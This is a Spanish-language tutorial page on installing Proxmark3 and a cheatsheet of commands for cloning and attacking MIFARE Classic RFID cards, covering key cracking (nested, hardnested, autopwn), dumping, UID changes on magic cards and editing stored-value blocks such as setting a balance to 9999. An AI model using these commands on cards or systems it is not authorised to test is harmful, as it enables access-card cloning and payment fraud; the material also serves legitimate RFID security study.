💳Clonación con Proxmark3

En esta sección aprenderás a utilizar la Proxmark3 para clonar y emular tarjetas NFC o RFID.

Instalación en Kali Linux

GitHub - RfidResearchGroup/proxmark3: Iceman Fork - Proxmark3GitHub

# Instalamos las dependencias necesarias
sudo apt-get update
sudo apt-get install --no-install-recommends git ca-certificates build-essential pkg-config libreadline-dev gcc-arm-none-eabi libnewlib-dev qtbase5-dev libbz2-dev libbluetooth-dev libpython3-dev

# Clonamos el repositorio
git clone https://github.com/RfidResearchGroup/proxmark3.git

# Detener ModemManager (puede bloquear la Proxmark)
sudo systemctl stop ModemManager
sudo systemctl disable ModemManager

# Ver mensajes del kernel
sudo dmesg 

# Compilar ejecutable
git pull
make clean && make all
make PLATFORM=PM3GENERIC

# Poner la Proxmark3 Easy en modo bootloader
En los clones Easy:
- No presiones ningún botón al principio.
- El script entrará SOLO al bootloader automáticamente.
- Si no lo hace, desconecta, MANTÉN pulsado el botón, conecta, suelta.

# Flashear el Bootloader
sudo ./pm3-flash-bootrom
- Cuando termine, desconecta y vuelve a conectar la Proxmark3.

# Flashear full image
sudo ./pm3-flash-fullimage

# Ejecutar
./pm3

Cheatsheet Proxmark3: MIFARE Classic & NFC HF

🔎 Detección y reconocimiento

hf search

Detecta tag HF.
Te dice si es MIFARE Classic, DESFire, etc.
Mira siempre:
- SAK
- Possible types
- Prng detection (Weak / Hardened / Static)

🧱 Comandos MIFARE Classic básicos

Todos estos solo sirven si la tarjeta es MIFARE Classic 1K/4K.

1️⃣ Buscar claves por defecto

hf mf chk
hf mf chk --1k

Prueba ~61 claves típicas hardcodeadas.
Si encuentra alguna, te la lista por sector/bloque.

2️⃣ Ataques automáticos (autopwn)

hf mf autopwn
hf mf autopwn --1k

Intenta:
- DarkSide
- Nested
- Hardnested
- StaticNested (si está soportado)
Al final te dice:
- qué claves ha sacado
- qué ataque ha funcionado

3️⃣ Ataque Nested manual

hf mf nested --1k --blk 0 -a -k A0A1A2A3A4A5

--blk 0 → bloque de inicio (sector 0, bloque 0)
-a → usar key A
-k → clave conocida
Saca claves del resto de sectores usando esa clave.

4️⃣ Ataque Hardnested

hf mf hardnested --blk 0 -a -k A0A1A2A3A4A5 --tblk 0 --tb

Para tarjetas con PRNG “hardened”.
Requiere al menos una clave válida.
Mucho más lento pero más potente.

5️⃣ Ataque StaticNested (nonce fijo)

hf mf staticnested --1k --blk 0 -a -k FFFFFFFFFFFF

Especial para tarjetas con Prng detection: Static o similares.
Requiere al menos una clave válida (típica: FFFFFFFFFFFF).

💾 Dumps, backup y restore (Classic)

1️⃣ Dump completo (backup)

Cuando ya tienes claves suficientes (por diccionario o ataques):

hf mf dump --1k -o tarjeta_dump.bin

Con archivo de claves (por ejemplo keys.dic):

hf mf dump --1k --keys keys.dic -o tarjeta_dump.bin

2️⃣ Restaurar dump (clonar contenido)

En una tarjeta compatible (misma capacidad, p.ej. 1K):

hf mf restore --1k -i tarjeta_dump.bin

👉 Esto no siempre clona el UID, solo el contenido de los sectores. Para clonar UID hace falta magic card.

🧬 UID, magic cards (Chinese Magic)

Ver UID actual

hf search

Cambiar UID (GEN1A / CUID / magic card)

hf mf csetuid 11223344

Solo funciona en tarjetas especiales (magic / UID changeable).
No lo intentes con una MIFARE original: no va a funcionar.

🧩 Lectura y análisis de sectores

Leer un sector completo

hf mf rdsc --sc 1 -k FFFFFFFFFFFF

--sc 1 → sector 1
-k → clave usada (key A por defecto)

Leer un bloque concreto

hf mf rdbl --blk 4 -k FFFFFFFFFFFF

--blk 4 → bloque 4 (sector 1, bloque 0)

💰 Value blocks (monederos)

Leer value block

hf mf valueblock read --blk 8 -k FFFFFFFFFFFF

Incrementar valor

hf mf valueblock inc --blk 8 -v 10 -k FFFFFFFFFFFF

Decrementar valor

hf mf valueblock dec --blk 8 -v 10 -k FFFFFFFFFFFF

Escribir valor directamente

hf mf valueblock write --blk 8 -v 9999 -k FFFFFFFFFFFF

Cuidado: puedes romper la lógica del sistema si no respetas el formato interno.

AnteriorAñadir nuevas tarjetas NFC SiguienteMIFARE Classic 1K

Última actualización hace 20 días

¿Te fue útil?